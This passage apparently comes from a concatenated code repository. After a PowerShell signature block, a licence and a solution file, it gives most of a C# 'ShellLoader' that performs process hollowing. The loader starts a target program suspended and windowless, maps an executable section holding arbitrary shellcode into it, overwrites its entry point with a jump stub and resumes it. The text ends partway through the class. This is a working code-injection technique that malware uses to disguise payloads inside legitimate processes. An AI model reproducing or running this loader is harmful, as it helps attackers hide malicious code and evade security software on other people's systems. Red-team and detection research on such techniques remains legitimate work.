# a4ydVfiS457VWmNbAklQ2YPOb2bu3cuF6V+l+dSHdIhEOxnJ5fWRn8YUOawk6qhL
# LJGJzF4o9GS2ULf1ErNzlgpno75hn67z/RJ4dQ6mWxT9RSOOhkRVfRiGBYxVh3lI
# RvfKDo2n3k5f4qi2LVkCYYhhchhoubh87ubnNC8xd4EwH7s2AY3vJ+P3mvBMMWSN
# 4+v6GYeofs/sjAw2W3rBerh4x8kGLkYQyI3oBGDbvHN0+k7Y/qpA8bLOcEaD6dpA
# oVk62RUJV5lWMJPzyWHM0AjMa+xiQpGsAsDvpPCJEY93AgMBAAGjggM1MIIDMTAO
# BgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEF
# BQcDCDCCAb8GA1UdIASCAbYwggGyMIIBoQYJYIZIAYb9bAcBMIIBkjAoBggrBgEF
# BQcCARYcaHR0cHM6Ly93d3cuZGlnaWNlcnQuY29tL0NQUzCCAWQGCCsGAQUFBwIC
# MIIBVh6CAVIAQQBuAHkAIAB1AHMAZQAgAG8AZgAgAHQAaABpAHMAIABDAGUAcgB0
# AGkAZgBpAGMAYQB0AGUAIABjAG8AbgBzAHQAaQB0AHUAdABlAHMAIABhAGMAYwBl
# AHAAdABhAG4AYwBlACAAbwBmACAAdABoAGUAIABEAGkAZwBpAEMAZQByAHQAIABD
# AFAALwBDAFAAUwAgAGEAbgBkACAAdABoAGUAIABSAGUAbAB5AGkAbgBnACAAUABh
# AHIAdAB5ACAAQQBnAHIAZQBlAG0AZQBuAHQAIAB3AGgAaQBjAGgAIABsAGkAbQBp
# AHQAIABsAGkAYQBiAGkAbABpAHQAeQAgAGEAbgBkACAAYQByAGUAIABpAG4AYwBv
# AHIAcABvAHIAYQB0AGUAZAAgAGgAZQByAGUAaQBuACAAYgB5ACAAcgBlAGYAZQBy
# AGUAbgBjAGUALjALBglghkgBhv1sAxUwHwYDVR0jBBgwFoAUFQASKxOYspkH7R7f
# or5XDStnAs0wHQYDVR0OBBYEFGFaTSS2STKdSip5GoNL9B6Jwcp9MH0GA1UdHwR2
# MHQwOKA2oDSGMmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3Vy
# ZWRJRENBLTEuY3JsMDigNqA0hjJodHRwOi8vY3JsNC5kaWdpY2VydC5jb20vRGln
# aUNlcnRBc3N1cmVkSURDQS0xLmNybDB3BggrBgEFBQcBAQRrMGkwJAYIKwYBBQUH
# MAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBBBggrBgEFBQcwAoY1aHR0cDov
# L2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0QXNzdXJlZElEQ0EtMS5jcnQw
# DQYJKoZIhvcNAQEFBQADggEBAJ0lfhszTbImgVybhs4jIA+Ah+WI//+x1GosMe06
# FxlxF82pG7xaFjkAneNshORaQPveBgGMN/qbsZ0kfv4gpFetW7easGAm6mlXIV00
# Lx9xsIOUGQVrNZAQoHuXx/Y/5+IRQaa9YtnwJz04HShvOlIJ8OxwYtNiS7Dgc6aS
# wNOOMdgv420XEwbu5AO2FKvzj0OncZ0h3RTKFV2SQdr5D4HRmXQNJsQOfxu19aDx
# xncGKBXp2JPlVRbwuwqrHNtcSCdmyKOLChzlldquxC5ZoGHd2vNtomHpigtt7BIY
# vfdVVEADkitrwlHCCkivsNRu4PQUCjob4489yq9qjXvc2EQwggbNMIIFtaADAgEC
# AhAG/fkDlgOt6gAK6z8nu7obMA0GCSqGSIb3DQEBBQUAMGUxCzAJBgNVBAYTAlVT
# MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j
# b20xJDAiBgNVBAMTG0RpZ2lDZXJ0IEFzc3VyZWQgSUQgUm9vdCBDQTAeFw0wNjEx
# MTAwMDAwMDBaFw0yMTExMTAwMDAwMDBaMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK
# EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNV
# BAMTGERpZ2lDZXJ0IEFzc3VyZWQgSUQgQ0EtMTCCASIwDQYJKoZIhvcNAQEBBQAD
# ggEPADCCAQoCggEBAOiCLZn5ysJClaWAc0Bw0p5WVFypxNJBBo/JM/xNRZFcgZ/t
# LJz4FlnfnrUkFcKYubR3SdyJxArar8tea+2tsHEx6886QAxGTZPsi3o2CAOrDDT+
# GEmC/sfHMUiAfB6iD5IOUMnGh+s2P9gww/+m9/uizW9zI/6sVgWQ8DIhFonGcIj5
# BZd9o8dD3QLoOz3tsUGj7T++25VIxO4es/K8DCuZ0MZdEkKB4YNugnM/JksUkK5Z
# ZgrEjb7SzgaurYRvSISbT0C58Uzyr5j79s5AXVz2qPEvr+yJIvJrGGWxwXOt1/HY
# zx4KdFxCuGh+t9V3CidWfA9ipD8yFGCV/QcEogkCAwEAAaOCA3owggN2MA4GA1Ud
# DwEB/wQEAwIBhjA7BgNVHSUENDAyBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUF
# BwMDBggrBgEFBQcDBAYIKwYBBQUHAwgwggHSBgNVHSAEggHJMIIBxTCCAbQGCmCG
# SAGG/WwAAQQwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3LmRpZ2ljZXJ0LmNv
# bS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUHAgIwggFWHoIBUgBB
# AG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQByAHQAaQBmAGkAYwBh
# AHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBjAGUAcAB0AGEAbgBj
# AGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAgAEMAUAAvAEMAUABT
# ACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQAGEAcgB0AHkAIABB
# AGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBtAGkAdAAgAGwAaQBh
# AGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBjAG8AcgBwAG8AcgBh
# AHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBlAHIAZQBuAGMAZQAu
# MAsGCWCGSAGG/WwDFTASBgNVHRMBAf8ECDAGAQH/AgEAMHkGCCsGAQUFBwEBBG0w
# azAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEMGCCsGAQUF
# BzAChjdodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVk
# SURSb290Q0EuY3J0MIGBBgNVHR8EejB4MDqgOKA2hjRodHRwOi8vY3JsMy5kaWdp
# Y2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290Q0EuY3JsMDqgOKA2hjRodHRw
# Oi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290Q0EuY3Js
# MB0GA1UdDgQWBBQVABIrE5iymQftHt+ivlcNK2cCzTAfBgNVHSMEGDAWgBRF66Kv
# 9JLLgjEtUYunpyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEARlA+ybcoJKc4HbZb
# Ka9Sz1LpMUerVlx71Q0LQbPv7HUfdDjyslxhopyVw1Dkgrkj0bo6hnKtOHisdV0X
# FzRyR4WUVtHruzaEd8wkpfMEGVWp5+Pnq2LN+4stkMLA0rWUvV5PsQXSDj0aqRRb
# poYxYqioM+SbOafE9c4deHaUJXPkKqvPnHZL7V/CSxbkS3BMAIke/MV5vEwSV/5f
# 4R68Al2o/vsHOE8Nxl2RuQ9nRc3Wg+3nkg2NsWmMT/tZ4CMP0qquAHzunEIOz5HX
# J7cW7g/DvXwKoO4sCFWFIrjrGBpN/CohrUkxg0eVd3HcsRtLSxwQnHcUwZ1PL1qV
# CCkQJjGCBEwwggRIAgEBMIGGMHIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdp
# Q2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xMTAvBgNVBAMTKERp
# Z2lDZXJ0IFNIQTIgQXNzdXJlZCBJRCBDb2RlIFNpZ25pbmcgQ0ECEAGfcm2O2qyx
# DgPgWB72KpowDQYJYIZIAWUDBAIBBQCggYQwGAYKKwYBBAGCNwIBDDEKMAigAoAA
# oQKAADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3AgELMQ4w
# DAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgCCPKt4WoiY1sbAfnZKmxtY0e
# oDPZ+qZBOsAu+KHmiGQwDQYJKoZIhvcNAQEBBQAEggEAwBaoh3PcM+OcihX5zILU
# 8lE2Ph0f3sEPqmr/5Tzs/S6XDZqy2ux/Uh3sDLcsdk9gywFhBOr2g0G4AFucN+N/
# E6LFPKPS1po34+wK6w7Z8mcRU+7vNyxPxc7Lycm2HzefwYaFcSA6xbAhHvNiNLd+
# 1/BumSqlJPBwdDr9H4Ri86CSYj7xRDpafZ6WncqgAMaXsYWsTiwbbiekIcExvZgg
# BnQ3fEDNBdmK0WZCdZX93DZEYKLdSH6r6lSWRW5IHgzlCWL5OP415GzkHgxthx2m
# utxvJHuF+LpZfDACQswPX61XwGo61Y6qX+l7g4clG5SeFoK8wbgrR12P4EgECKzy
# 66GCAg8wggILBgkqhkiG9w0BCQYxggH8MIIB+AIBATB2MGIxCzAJBgNVBAYTAlVT
# MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j
# b20xITAfBgNVBAMTGERpZ2lDZXJ0IEFzc3VyZWQgSUQgQ0EtMQIQAwGaAjr/WLFr
# 1tXq5hfwZjAJBgUrDgMCGgUAoF0wGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAc
# BgkqhkiG9w0BCQUxDxcNMTYwOTExMTkwMzE5WjAjBgkqhkiG9w0BCQQxFgQUBFvE
# Qx3Ondofr5v3IdqidXufRVUwDQYJKoZIhvcNAQEBBQAEggEANXU9soYMqHDm1v0E
# QcIMRTYPkv2xB/xDIc4JmhfFKMO3SUDA1m6lS2w6WWbhNu0GRTFT2Bed712y8qXI
# t9uO1BDTxDyl0lBYAKjUDnWI17cZpHEcx5snT1D2CYv29TfOpH9/+gzlddWrdB9q
# VTcEo1/hFH0B4ffgE8YNcw4jg+e7b3nKpGjBDwr6SqMWwTZv37qj/xvLubtzEKEi
# i1g6VG4tnvWcH2TD5bGmtzLZ8N1fyktdju8B5oscnSYeiX/Z26ZM2JN8coHNSW1k
# krCJqqlTJrihEOvqs/NiDKyq1lBh3Es/o6LaNxYDeHr/8ntIqfMpbI6ZB+7RW0XC
# B6o+Cw==
# SIG # End signature block

--------------------------------------------------------------------------------
/ProcessHollowing/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2017, Aaron
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------
/ProcessHollowing/ProcHollow.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.26730.12
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TestApp", "TestApp\TestApp.csproj", "{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellLoader", "ShellLoader\ShellLoader.csproj", "{B8282841-0368-48B9-98EB-53BD511422D9}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|ARM = Debug|ARM
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|Any CPU = Release|Any CPU
		Release|ARM = Release|ARM
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|ARM.ActiveCfg = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|ARM.Build.0 = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x64.ActiveCfg = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x64.Build.0 = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x86.ActiveCfg = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Debug|x86.Build.0 = Debug|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|Any CPU.Build.0 = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|ARM.ActiveCfg = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|ARM.Build.0 = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x64.ActiveCfg = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x64.Build.0 = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x86.ActiveCfg = Release|Any CPU
		{940FF99B-C2D3-4614-A9A1-EB6A7AD08858}.Release|x86.Build.0 = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|ARM.ActiveCfg = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|ARM.Build.0 = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x64.ActiveCfg = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x64.Build.0 = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x86.ActiveCfg = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Debug|x86.Build.0 = Debug|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|Any CPU.Build.0 = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|ARM.ActiveCfg = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|ARM.Build.0 = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|x64.ActiveCfg = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|x64.Build.0 = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|x86.ActiveCfg = Release|Any CPU
		{B8282841-0368-48B9-98EB-53BD511422D9}.Release|x86.Build.0 = Release|Any CPU
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {82E493BC-58E8-4793-84B6-6C54274E5952}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/ProcessHollowing/ShellLoader/Loader.cs:
--------------------------------------------------------------------------------
/***************
 *
 * Simple Process Hollowing in C#
 *
 * @author: Aaron Bray
 * @github: github.com/ambray
 *
 **************/

using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;

namespace ShellLoader
{
    public sealed class Loader
    {
        [StructLayout(LayoutKind.Sequential)]
        public struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public int dwProcessId;
            public int dwThreadId;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_BASIC_INFORMATION
        {
            public IntPtr Reserved1;
            public IntPtr PebAddress;
            public IntPtr Reserved2;
            public IntPtr Reserved3;
            public IntPtr UniquePid;
            public IntPtr MoreReserved;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct STARTUPINFO
        {
            uint cb;
            IntPtr lpReserved;
            IntPtr lpDesktop;
            IntPtr lpTitle;
            uint dwX;
            uint dwY;
            uint dwXSize;
            uint dwYSize;
            uint dwXCountChars;
            uint dwYCountChars;
            uint dwFillAttributes;
            uint dwFlags;
            ushort wShowWindow;
            ushort cbReserved;
            IntPtr lpReserved2;
            IntPtr hStdInput;
            IntPtr hStdOutput;
            IntPtr hStdErr;
        }

        public const uint PageReadWriteExecute = 0x40;
        public const uint PageReadWrite = 0x04;
        public const uint PageExecuteRead = 0x20;
        public const uint MemCommit = 0x00001000;
        public const uint SecCommit = 0x08000000;
        public const uint GenericAll = 0x10000000;
        public const uint CreateSuspended = 0x00000004;
        public const uint DetachedProcess = 0x00000008;
        public const uint CreateNoWindow = 0x08000000;

        [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern int ZwCreateSection(ref IntPtr section, uint desiredAccess, IntPtr pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile);

        [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern int ZwMapViewOfSection(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot);

        [DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern void GetSystemInfo(ref SYSTEM_INFO lpSysInfo);

        [DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern IntPtr GetCurrentProcess();

        [DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern void CloseHandle(IntPtr handle);

        [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern int ZwUnmapViewOfSection(IntPtr hSection, IntPtr address);

        [DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
        private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref STARTUPINFO lpStartinfo, out PROCESS_INFORMATION lpProcInformation);

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern uint ResumeThread(IntPtr hThread);

        [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass, ref PROCESS_BASIC_INFORMATION procInformation, uint ProcInfoLen, ref uint retlen);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);

        [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.StdCall)]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, IntPtr nSize, out IntPtr lpNumWritten);

        [DllImport("kernel32.dll")]
        static extern uint GetLastError();

        [StructLayout(LayoutKind.Sequential)]
        public struct SYSTEM_INFO
        {
            public uint dwOem;
            public uint dwPageSize;
            public IntPtr lpMinAppAddress;
            public IntPtr lpMaxAppAddress;
            public IntPtr dwActiveProcMask;
            public uint dwNumProcs;
            public uint dwProcType;
            public uint dwAllocGranularity;
            public ushort wProcLevel;
            public ushort wProcRevision;
        }

        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        public struct LARGE_INTEGER
        {
            public uint LowPart;
            public int HighPart;
        }

        IntPtr section_;
        IntPtr localmap_;
        IntPtr remotemap_;
        IntPtr localsize_;
        IntPtr remotesize_;
        IntPtr pModBase_;
        IntPtr pEntry_;
        uint rvaEntryOffset_;
        uint size_;
        byte[] inner_;

        public uint round_to_page(uint size)
        {
            SYSTEM_INFO info = new SYSTEM_INFO();

            GetSystemInfo(ref info);

            return (info.dwPageSize - size % info.dwPageSize) + size;
        }

        const int AttributeSize = 24;

        private bool nt_success(long v)
        {
            return (v >= 0);
        }

        public IntPtr GetCurrent()
        {
            return GetCurrentProcess();
        }

        /***
         * Maps a view of the current section into the process specified in procHandle.
         */
        public KeyValuePair<IntPtr, IntPtr> MapSection(IntPtr procHandle, uint protect, IntPtr addr)
        {
            IntPtr baseAddr = addr;
            IntPtr viewSize = (IntPtr)size_;

            var status = ZwMapViewOfSection(section_, procHandle, ref baseAddr, (IntPtr)0, (IntPtr)0, (IntPtr)0, ref viewSize, 1, 0, protect);

            if (!nt_success(status))
                throw new SystemException("[x] Something went wrong! " + status);

            return new KeyValuePair<IntPtr, IntPtr>(baseAddr, viewSize);
        }

        /***
         * Attempts to create an RWX section of the given size
         */
        public bool CreateSection(uint size)
        {
            LARGE_INTEGER liVal = new LARGE_INTEGER();
            size_ = round_to_page(size);
            liVal.LowPart = size_;

            var status = ZwCreateSection(ref section_, GenericAll, (IntPtr)0, ref liVal, PageReadWriteExecute, SecCommit, (IntPtr)0);

            return nt_success(status);
        }

        /***
         * Maps a view of the section into the current process
         */
        public void SetLocalSection(uint size)
        {
            var vals = MapSection(GetCurrent(), PageReadWriteExecute, IntPtr.Zero);
            if (vals.Key == (IntPtr)0)
                throw new SystemException("[x] Failed to map view of section!");

            localmap_ = vals.Key;
            localsize_ = vals.Value;
        }

        /***
         * Copies the shellcode buffer into the section
         */
        public void CopyShellcode(byte[] buf)
        {
            var lsize = size_;
            if (buf.Length > lsize)
                throw new IndexOutOfRangeException("[x] Shellcode buffer is too long!");

            unsafe
            {
                byte* p = (byte*)localmap_;

                for (int i = 0; i < buf.Length; i++)
                {
                    p[i] = buf[i];
                }
            }
        }

        /***
         * Create a new process using the binary located at "path", starting up suspended.
         */
        public PROCESS_INFORMATION StartProcess(string path)
        {
            STARTUPINFO startInfo = new STARTUPINFO();
            PROCESS_INFORMATION procInfo = new PROCESS_INFORMATION();

            uint flags = CreateSuspended | DetachedProcess | CreateNoWindow;

            if (!CreateProcess((IntPtr)0, path, (IntPtr)0, (IntPtr)0, true, flags, (IntPtr)0, (IntPtr)0, ref startInfo, out procInfo))
                throw new SystemException("[x] Failed to create process!");

            return procInfo;
        }

        const ulong PatchSize = 0x10;

        /***
         * Constructs the shellcode patch for the new process entry point. It will build either an x86 or x64 payload based
         * on the current pointer size.
         * Ultimately, we will jump to the shellcode payload
         */
        public KeyValuePair<int, IntPtr> BuildEntryPatch(IntPtr dest)
        {
            int i = 0;
            IntPtr ptr;

            ptr = Marshal.AllocHGlobal((IntPtr)PatchSize);

            unsafe
            {
                var p = (byte*)ptr;
                byte[] tmp = null;

                if (IntPtr.Size == 4)
                {
                    p[i] = 0xb8; // mov eax,
                    i++;
                    var val = (Int32)dest;
                    tmp = BitConverter.GetBytes(val);
                }
                else
                {
                    p[i] = 0x48; // rex
                    i++;
                    p[i] = 0xb8; // mov rax,
                    i++;

                    var val = (Int64)dest;
                    tmp = BitConverter.GetBytes(val);
                }

                for (int j = 0; j < IntPtr.Size; j++)
                    p[i + j] = tmp[j];

                i += IntPtr.Size;
                p[i] = 0xff;
                i++;
                p[i] = 0xe0; // jmp [r|e]ax
                i++;
            }

            return new KeyValuePair<int, IntPtr>(i, ptr);
        }

        /**
         * We will locate the entry point for the main module in the remote process for patching.
         */
        private IntPtr GetEntryFromBuffer(byte[] buf)
        {
            IntPtr res = IntPtr.Zero;
            unsafe
            {
                fixed (byte* p = buf)
                {
                    uint e_lfanew_offset = *((uint*)(p + 0x3c)); // e_lfanew offset in IMAGE_DOS_HEADERS

                    byte* nthdr = (p + e_lfanew_offset);

                    byte* opthdr = (nthdr + 0x18); // IMAGE_OPTIONAL_HEADER start

                    ushort t = *((ushort*)opthdr);

                    byte* entry_ptr = (opthdr + 0x10); // entry point rva

                    var tmp = *((int*)entry_ptr);

                    rvaEntryOffset_ = (uint)tmp;

                    // rva -> va
                    if (IntPtr.Size == 4)
                        res = (IntPtr)(pModBase_.ToInt32() + tmp);
                    else
                        res = (IntPtr)(pModBase_.ToInt64() + tmp);
                }
            }

            pEntry_ = res;
            return res;
        }

        /**
         * Locate the module base address in the remote process,
         * read in the first page, and locate the entry point.
         */
        public IntPtr FindEntry(IntPtr hProc)
        {
            var basicInfo = new PROCESS_BASIC_INFORMATION();
            uint tmp = 0;

            var success = ZwQueryInformationProcess(hProc, 0, ref basicInfo, (uint)(IntPtr.Size * 6), ref tmp);
            if (!nt_success(success))
                throw new SystemException("[x] Failed to get process information!");

            IntPtr readLoc = IntPtr.Zero;
            var addrBuf = new byte[IntPtr.Size];
            if (IntPtr.Size == 4)
            {
                readLoc = (IntPtr)((Int32)basicInfo.PebAddress + 8);
            }
            else
            {
                readLoc = (IntPtr)((Int64)basicInfo.PebAddress + 16);
            }

            IntPtr nRead = IntPtr.Zero;

            if (!ReadProcessMemory(hProc, readLoc, addrBuf, addrBuf.Length, out nRead) || nRead == IntPtr.Zero)
                throw new SystemException("[x] Failed to read process memory!");

            if (IntPtr.Size == 4)
                readLoc = (IntPtr)(BitConverter.ToInt32(addrBuf, 0));
            else
                readLoc = (IntPtr)(BitConverter.ToInt64(addrBuf, 0));

            pModBase_ = readLoc;
            if (!ReadProcessMemory(hProc, readLoc, inner_, inner_.Length, out nRead) || nRead == IntPtr.Zero)
                throw new SystemException("[x] Failed to read module start!");

            return GetEntryFromBuffer(inner_);
        }

        /**
         * Map our shellcode into the remote (suspended) process,
         * locate and patch the entry point (so our code will run instead of
         * the original application), and resume execution.
         */
        public void MapAndStart(PROCESS_INFORMATION pInfo)
        {
            var tmp = MapSection(pInfo.hProcess, PageReadWriteExecute, IntPtr.Zero);
            if (tmp.Key == (IntPtr)0 || tmp.Value == (IntPtr)0)
                throw new SystemException("[x] Failed to map section into target process!");

            remotemap_ = tmp.Key;
            remotesize_ = tmp.Value;

            var patch = BuildEntryPatch(tmp.Key);

            try
            {
                var pSize = (IntPtr)patch.Key;
                IntPtr tPtr = new IntPtr();

                if (!WriteProcessMemory(pInfo.hProcess, pEntry_, patch.Value, pSize, out tPtr) || tPtr == IntPtr.Zero)
                    throw new SystemException("[x] Failed to write patch to start location! " + GetLastError());
            }
            finally
            {
                if (patch.Value != IntPtr.Zero)
                    Marshal.FreeHGlobal(patch.Value);
            }

            var tbuf = new byte[0x1000];
            var nRead = new IntPtr();
            if (!ReadProcessMemory(pInfo.hProcess, pEntry_, tbuf, 1024, out nRead))
                throw new SystemException("Failed!");

            var res = ResumeThread(pInfo.hThread);
            if (res == unchecked((uint)-1))
                throw new SystemException("[x] Failed to restart thread!");
        }

        public IntPtr GetBuffer()
        {
            return localmap_;
        }

        ~Loader()
        {
            if (localmap_ != (IntPtr)0)
                ZwUnmapViewOfSection(section_, localmap_);
        }

        /**
         * Given a path to a binary and a buffer of shellcode,
         * 1.) start a new (suspended) process
         * 2.) map a view of our shellcode buffer into it
         * 3.) patch the original process entry point
         * 4.) resume execution
         */
        public void Load(string targetProcess, byte[] shellcode)
        {
            var pinf = StartProcess(targetProcess);
            FindEntry(pinf.hProcess);

            if (!CreateSection((uint)shellcode.Length))
                throw new SystemException("[x] Failed to create new section!");

            SetLocalSection((uint)shellcode.Length);

            CopyShellcode(shellcode);

            MapAndStart(pinf);

            CloseHandle(pinf.hThread);
            CloseHandle(pinf.hProcess);
        }

        public Loader()
        {
